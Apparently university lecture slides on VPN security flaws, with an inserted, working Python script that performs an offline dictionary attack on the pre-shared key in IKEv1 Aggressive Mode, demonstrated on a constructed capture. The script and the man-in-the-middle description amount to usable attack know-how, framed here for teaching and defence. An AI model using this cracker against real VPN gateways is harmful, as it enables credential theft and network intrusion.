VPN AND SECURITY FLAWS

Rajesh Perumal
Clemson University
VPN – AN ATTRACTIVE TARGET
- VPN tunnels carry sensitive information.
- A remote access VPN exposes the entire internal network to whoever can authenticate as a client.
- Intrusion Detection Systems cannot inspect VPN traffic, because it is encrypted in transit.
- As Internet-facing servers become better hardened, the VPN gateway becomes a more tempting target.
VPN FLAWS
- Insecure storage of authentication credentials by VPN clients
- Username enumeration vulnerabilities
- Offline password cracking
- Man in the middle attacks
- Lack of account lockout
- Poor default configurations
- Poor guidance and documentation
INSECURE STORAGE OF AUTHENTICATION CREDENTIALS BY VPN CLIENTS
- Storing the username unencrypted in a file or in the registry.
- Storing the password in a scrambled or obfuscated form: obfuscation is reversible, so anyone who can read the file or registry key can recover the password.
- A dump of physical memory can reveal the plaintext password while the client is running.
- Caching credentials so that the user is not prompted again.
USERNAME ENUMERATION VULNERABILITIES
- With IKE Aggressive Mode and PSK authentication, the gateway's response (or lack of one) tells the attacker whether the login name it sent was valid. By trying candidate names and watching the responses, the attacker can deduce which usernames exist.
OFFLINE PASSWORD CRACKING
- The authentication hash is easy to obtain: in Aggressive Mode the responder's hash (HASH_R) is sent in the clear in the second message.
- The only secret input to that hash is the pre-shared key, and every other input is visible on the wire.
- A dictionary attack on the captured hash reveals the password in a feasible amount of time, with no further interaction with the gateway.
MAN IN THE MIDDLE ATTACKS
- By installing a packet sniffing system between the VPN client and the server, an attacker can read the cleartext username (the ID payload) and crack the password from the 1st and 2nd packets of the IKE Aggressive Mode exchange.
- The sniffing system (SS) acts as a server towards the client and as a client towards the server. From the client it learns the username, the ISAKMP messages and, after cracking, the password, and it can issue its own ISAKMP messages to the client. Knowing the username and password, it can likewise send its own ISAKMP messages to the real server and complete the exchange on the client's behalf.
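The offline cracking and man-in-the-middle slides above both rest on the same fact: in IKEv1 Aggressive Mode with PSK authentication, the responder's hash in message 2 is computed from the pre-shared key plus values that all appear in messages 1 and 2. The following is an added example, not code from the original slides, that models RFC 2409 section 5.4 and runs a dictionary attack against a captured HASH_R. The capture itself (cookies, nonces, DH values, IDs, the group name "vpngroup", the PSK "summer2006") is constructed inline for the demo; in a real engagement these fields would be parsed from the first two UDP/500 packets.

```python
"""IKEv1 Aggressive Mode (PSK) offline cracking, modelled on RFC 2409 section 5.4.

Added example, not from the original slides. All captured values are
constructed for the demo; a real attack would parse them from the first two
UDP/500 packets of the exchange (e.g. from a pcap).
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional


@dataclass(frozen=True)
class AggressiveModeCapture:
    """Fields visible to an eavesdropper in the first two Aggressive Mode messages."""
    # Message 1, initiator -> responder: HDR, SA, KE, Ni, IDii
    cky_i: bytes    # initiator cookie, from the ISAKMP header
    sai_b: bytes    # body of the SA payload the initiator offered
    g_xi: bytes     # initiator Diffie-Hellman public value (KE payload)
    ni_b: bytes     # initiator nonce body
    idii_b: bytes   # initiator ID body: the user/group name, sent in clear
    # Message 2, responder -> initiator: HDR, SA, KE, Nr, IDir, HASH_R
    cky_r: bytes
    g_xr: bytes
    nr_b: bytes
    idir_b: bytes
    hash_r: bytes   # responder authentication hash; its only secret input is the PSK
    prf: str = "sha1"  # negotiated hash algorithm, "md5" or "sha1"


def skeyid(psk: bytes, cap: AggressiveModeCapture) -> bytes:
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b). Both nonces are on the wire."""
    return hmac.new(psk, cap.ni_b + cap.nr_b, cap.prf).digest()


def compute_hash_r(psk: bytes, cap: AggressiveModeCapture) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    msg = cap.g_xr + cap.g_xi + cap.cky_r + cap.cky_i + cap.sai_b + cap.idir_b
    return hmac.new(skeyid(psk, cap), msg, cap.prf).digest()


def compute_hash_i(psk: bytes, cap: AggressiveModeCapture) -> bytes:
    """HASH_I = prf(SKEYID, g^xi | g^xr | CKY-I | CKY-R | SAi_b | IDii_b).

    Sent by the initiator in message 3; not needed for the attack, because
    HASH_R in message 2 already lets us test PSK guesses."""
    msg = cap.g_xi + cap.g_xr + cap.cky_i + cap.cky_r + cap.sai_b + cap.idii_b
    return hmac.new(skeyid(psk, cap), msg, cap.prf).digest()


def crack_psk(cap: AggressiveModeCapture, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Dictionary attack on HASH_R. Entirely offline: the gateway never sees a
    guess, so account lockout (if any) cannot help."""
    for psk in candidates:
        if hmac.compare_digest(compute_hash_r(psk, cap), cap.hash_r):
            return psk
    return None


def _fake(label: bytes, n: int) -> bytes:
    """Deterministic constructed filler, so the demo capture is reproducible."""
    out = b""
    while len(out) < n:
        out += hashlib.sha256(label + len(out).to_bytes(2, "big")).digest()
    return out[:n]


def build_constructed_capture(psk: bytes, prf: str = "sha1") -> AggressiveModeCapture:
    """Fabricate a capture as a responder using `psk` would have produced it.

    Sizes follow IKEv1: 8-byte cookies, 128-byte DH values (group 2), and an ID
    body of 4 header bytes (type, protocol, port) followed by the identity."""
    fields = dict(
        cky_i=_fake(b"cky_i", 8), sai_b=_fake(b"sai_b", 40), g_xi=_fake(b"g_xi", 128),
        ni_b=_fake(b"ni_b", 20), idii_b=b"\x0b\x00\x00\x00" + b"vpngroup",  # ID_KEY_ID
        cky_r=_fake(b"cky_r", 8), g_xr=_fake(b"g_xr", 128), nr_b=_fake(b"nr_b", 20),
        idir_b=b"\x01\x00\x00\x00" + bytes([203, 0, 113, 1]),             # ID_IPV4_ADDR
        prf=prf,
    )
    unsigned = AggressiveModeCapture(hash_r=b"", **fields)
    return AggressiveModeCapture(hash_r=compute_hash_r(psk, unsigned), **fields)


def demo() -> Optional[bytes]:
    """Capture one constructed exchange and run a small wordlist against it."""
    cap = build_constructed_capture(b"summer2006")
    wordlist = [b"password", b"cisco123", b"vpn", b"summer2006", b"letmein"]
    return crack_psk(cap, wordlist)


if __name__ == "__main__":
    cap = build_constructed_capture(b"summer2006")
    print("initiator ID seen in clear:", cap.idii_b[4:].decode())
    print("recovered PSK:", crack_psk(cap, [b"password", b"summer2006"]))
```

Note that the attacker needs nothing beyond passive capture: the username (IDii) is readable as soon as message 1 is seen, and every PSK guess is checked locally against HASH_R, which is why a lockout policy on the gateway does not slow this down. Main Mode with PSK does not expose the hash this way, and certificate or XAUTH-plus-certificate authentication removes the shared secret from the equation entirely.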
POOR GUIDANCE AND DOCUMENTATION
- The end user is not given proper documentation and is not well enough informed to make sound configuration decisions.
- The user therefore keeps the default settings and the default encryption.
CONCLUSION
- Among remote access VPN systems, 90% have had significant security issues.
- The cryptographic techniques adopted are strong; the vulnerabilities come from poor configuration.
- Well accepted security practices are not followed.
- Leaking information about valid usernames is prevented in operating systems but not in VPNs.
- Users choose the default configuration on the basis of ease of use rather than security, e.g. IKE Aggressive Mode with PSK authentication.
- Users do not appreciate how severe the bad configuration options are.
- Proper testing is needed. Tools like ike-scan help in testing the VPN.